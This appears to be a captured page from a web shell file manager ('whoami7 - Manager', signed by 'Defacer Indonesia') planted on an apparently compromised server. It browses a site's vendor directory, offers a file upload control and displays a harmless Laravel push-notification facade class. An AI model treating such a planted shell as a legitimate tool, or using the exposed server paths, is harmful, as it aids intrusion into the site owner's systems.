whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
edujugon
/
push-notification
/
src
/
Facades
/
Upload File:
files >> //home/kckglobal/www/portal/vendor/edujugon/push-notification/src/Facades/PushNotification.php
<?php namespace Edujugon\PushNotification\Facades; use Illuminate\Support\Facades\Facade; class PushNotification extends Facade { /** * Get the registered name of the component. * * @return string */ protected static function getFacadeAccessor() { return 'edujugonPushNotification'; } }
Copyright ©2021 || Defacer Indonesia